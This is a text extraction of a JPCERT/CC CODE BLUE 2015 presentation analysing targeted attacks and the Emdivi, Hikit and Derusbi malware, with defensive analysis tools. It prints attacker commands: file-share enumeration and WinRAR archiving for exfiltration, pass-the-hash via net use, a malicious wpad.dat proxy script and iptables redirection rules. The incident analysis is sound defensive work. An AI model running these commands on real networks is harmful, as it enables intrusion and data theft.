JPCERT CODE BLUE 2015
Copyright2015 JPCERT/CC All rights reserved.
JPCERT/CC
Shusei Tomonaga
Yuu Nakamura
JPCERT: Japan Computer Emergency Response Team Coordination Center (CSIRT)
JPCERT/CC
5201549934
130
934AB
A
Flash Player (CVE-2015-5119, CVE-2015-5122)
MS14-068 (Kerberos, KB3011780) - CVE-2014-6324
Timeline of Attack Vector
Drive-by download: 2014/05, 2015/01, 2015/05, 2015/07 (CVE-2014-7247, CVE-2015-5119, CVE-2015-5122)
zip / lzh archives: 2014/09, 2014/11, 2015/09
dsquery
Nirsoft Mail PassView
1. > net use
OK  T:  \\FILESV01\SECRET  Microsoft Windows Network
OK  U:  \\FILESV02\SECRET  Microsoft Windows Network
> wmic logicaldisk get caption,providername,drivetype,volumename
Caption  DriveType  ProviderName       VolumeName
C:       3                             OS
D:       3
T:       4          \\FILESV01\SECRET
U:       4          \\FILESV01\SECRET
Mapped network drives are enumerated with NET USE and wmic (DriveType = 4: network drive).
2. > netstat -an
TCP  192.168.xx.xx:49217  192.168.yy.yy:445  ESTABLISHED
> nbtstat -a 192.168.yy.yy
FILESV01
File-server sessions are identified with netstat (port 445) and nbtstat.
> dir c:\users\hoge\*.doc* /s /o-d
c:\users\hoge\AppData\Local\Temp
2014/07/29 10:19  28,672  20140820.doc
  1 file(s)  28,672 bytes
c:\users\hoge\
2015/08/29 10:03  1,214  .doc
> dir \\FILESV01\SECRET
\\FILESV\SECRET
2014/07/11 09:16  [DIR]
2014/09/04 11:49  [DIR]
2014/08/01 09:27  [DIR]
dir /s : include subdirectories; /o-d : sort by date, newest first.
> winrar.exe a -r -ed -v300m -ta20140101 %TEMP%\a.rar \\FILESV01\SECRET\ -n*.ppt* -n*.doc* -n*.xls* -n*.jtd
Adding \\FILESV01\SECRET\\(2015.05.01).docx  OK
Adding \\FILESV01\SECRET\\.ppt  OK
Adding \\FILESV01\SECRET\\.xlsx  OK
Adding \\FILESV01\SECRET\\.jtd  OK
WinRAR switches: -r recurse subdirectories, -ed do not add empty directories, -v300m split into 300 MB volumes, -ta20140101 only files modified after 2014-01-01, -n include only the listed file masks. The resulting RAR volumes are sent to the C&C server (rar -> C&C).
(MS14-068 + MS14-058)
Hosts: Domain Controller, PC-A, PC-B
1. (MS14-058) mimikatz
2. MS14-068 -> Domain Admin
3. DC: mimikatz (admin)
4. PC-B
5., 6. (diagram steps, text lost)
SYSVOL
(diagram: C2 Server, Domain Controller, PC-A, PC-B; steps 1-6, step 3: admin)
(diagram: PC-A, PC-B, Domain Controller; 1. Domain Admins, 2. logon.exe, steps 3-5)
Builtin Administrator
(diagram: PC-A, PC-B; steps 1-5)
1. (UAC bypass)
2. pass the hash, or: net use \\PC-B\IPC$ [password] /u:Administrator
(diagram: PC-A, PC-B; steps 1-2)
WPAD (Web Proxy Auto-Discovery)
The client learns the proxy configuration URL via DHCP or by resolving the name "wpad", e.g. http://wpad/wpad.dat.
WPAD (step 1: NetBIOS spoofing)
Hosts: PC-A, PC-B
1. Broadcast: NetBIOS name query for WPAD
2. wpad.exe answers the name query ("I am WPAD")
WPAD (step 2: fake WPAD server)
Hosts: PC-A, PC-B
3. request http://wpad/wpad.dat
4. wpad.exe responds with the following wpad.dat ([PC-A addr] is the slide's placeholder for PC-A's IP address):
function FindProxyForURL(url, host) {
    if (myIpAddress() != "[PC-A addr]") {
        return "PROXY wpad:8888; DIRECT";
    }
    return "DIRECT";
}
WPAD (step 3: man-in-the-middle proxy)
Hosts: PC-A, PC-B
5. wpad.exe, acting as the proxy, injects an iframe into pages returned from the Web site
6. drive-by download attack from the attacker's Web site
Techniques covered: AD (MS14-068), DC SYSVOL, Builtin Administrator, WPAD
Malware
  Emdivi (t17)       HTTP bot         EXE
  usp10jpg                            DLL, data
  Emdivi (t19, t20)  (t17) HTTP bot   EXE
  BeginX                              EXE
  GStatus            HTTP bot         EXE, DLL
Source: [MWS, 2015]
Tools
  Pass-the-hash: Quarks PwDump (qp.exe, qd.exe, QDump.exe); Mimikatz Lite (gp.exe); Windows Credentials Editor (wce.exe, ww.exe); Mimikatz (mz.exe, mimikatz.exe, mimikatz.rar (sekurlsa.dll))
  MS14-068 (CVE-2014-6324): ms14-068.exe, ms14-068.tar.gz
  MS14-058 (CVE-2014-4113): 4113.exe
  UAC bypass: msdart.exe, puac.exe
  Htran, proxy: Htran, htproxy.exe
  nirsoft Mail PassView: CallMail.exe, outl.exe
  logon: logon.exe
  WinRAR: yrar.exe, rar.exe
  dir: dirasd.exe
  timestamp: timestomp.exe
Emdivi (t17), HTTP bot
Commands: DOABORT, DOWNBG, GETFILE, LOADDLL, SETCMD, SUSPEND, UPLOAD, VERSION, GOTO (2015/5), CLEARLOGS (2015/8)
Emdivi (t20): SID, (JPCERT)
usp10jpg
Emdivi DLL, dwmapi.dll, ***.DAT, DLL -> DLL
usp10jpg, Emdivi
BeginX
BeginX Server: UDP / TCP
BeginX Client, BeginX Server, Emdivi
(diagram: Emdivi, BeginxServer, BeginxClient, BeginX)
GStatus: HTTP bot (Emdivi)
GStatus Web
emdivi_string_decryptor.py
Emdivi encoded strings
emdivi_string_decryptor.py: difference depending on version string

           Ver 17                                     Ver 19 or 20                        Ver 20
Encrypt    XxTEA encrypt                              XxTEA decrypt                       AES decrypt
Decrypt    XxTEA decrypt                              XxTEA encrypt                       AES encrypt
Key        MD5( MD5(base64(ver)) + MD5(key_string) )  Scanf( "%x", Inc_Add( ver17_key ) ) Inc_Add( ver17_key )
Demo
A B
Attack techniques
Web
(diagram: steps 0-1, Web)
.htaccess (table: Target name, IP address)
0day Exploit
Attack techniques
(diagram: steps 0-1)
(diagram: 0. iptables, 1.)
iptables -t nat -A PREROUTING -i eth0 -s aa.bb.cc.dd -p tcp --dport 80 -j DNAT --to-destination ww.xx.yy.zz:53
iptables: HTTP (port 80) traffic arriving on eth0 from the source aa.bb.cc.dd is forwarded (DNAT) to ww.xx.yy.zz:53.
Attack techniques
(diagram: .com DNS, DNS / Web; 0., 1. DNS, 2. DNS, 4. Web)
iptables -t nat -A PREROUTING -p udp --dport 53 -m string --from 40 --to 46 --hex-string "|03|AAA" --algo bm -j DNAT --to-destination aa.bb.cc.dd:54
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ww.xx.yy.zz:53
iptables rules for DNS: queries for AAA.example.com (the label "AAA" preceded by its length byte 0x03, matched at bytes 40-46 of the packet) are redirected to aa.bb.cc.dd:54; all other DNS queries are forwarded to ww.xx.yy.zz:53.
Command table (command / info): 0x184004, 0x184008, 0x18400c, 0x184010, 0x184014, 0x184018, 0x18401c, 0x184020, 0x184024, 0x184028, 0x18402c, 0x184030 (Sleep), 0x184034, 0x184038 (Sleep Time), 0x18403c; command descriptions lost
HTTP
Web C2: start / end markers
start: @MICR0S0FT       end: C0RP0RATI0N
start: lOve yOu 4 eveR  end: Reve 4 uOy evOl
Command table (command number / info): 0, 1 (TickCount), 3, 4, 5, 6, 7, 8, 9; descriptions lost
ROP -> Shellcode -> Malware (CVE-2013-3918 with McRAT)
CVE-2013-3918 with McRAT: rundll32.exe, Shellcode
Command table (HTTP): downonly, downexec
Preshin Controller (PHP)
Command table (HTTP): commands 1, 2, 3, 4, 5, 7, 8-9, 10, 11, 12, 13; descriptions lost
Hikit (Rootkit) commands: file information, proxy connect, shell, socks5, exit
Derusbi commands: cmd4, cmd5, cmd6, cmd7, cmd8, cmd9
Identity              Type  Country
System Integrator     exe   Japan
Software Vendor       exe   Japan
Software Vendor       exe   Korea
Automaker             exe   Korea
Heavy Industry        jar   Korea
Software Vendor       exe   Korea
Electronics Industry  jar   Korea
Software Vendor       exe   Korea
Backdoor, C2, iptables
Linux Backdoor: mod_rootme, Roronoa
Linux Backdoor functions: MyNetstat, CreateShell, Mymkdir, PortTunnelGet, GetFileSource, Mymkfile, PortTunnel_RemoteClose, MyPs, Myrmfile, PortTunnel_Show, KillByPid, Myrmdir, CreatePortTunnel, NewConnectTo, ListDir, PortForwardStart, PutFile, my_reboot, PortForward_Show, PutFileDest, ShowHide, PortForward_Close, ShellServer, SwitchHide
apt17scan.py
Scan with YARA -> Search configuration data address -> Parse configuration data -> Dump configuration
Commands: apt17scan; derusbiconfig (Derusbi); hikitconfig (Hikit); agtidconfig (Agtid)
Demo
How to download: https://github.com/JPCERTCC
Thank you
[email protected]  https://www.jpcert.or.jp
[email protected]  https://www.jpcert.or.jp/form/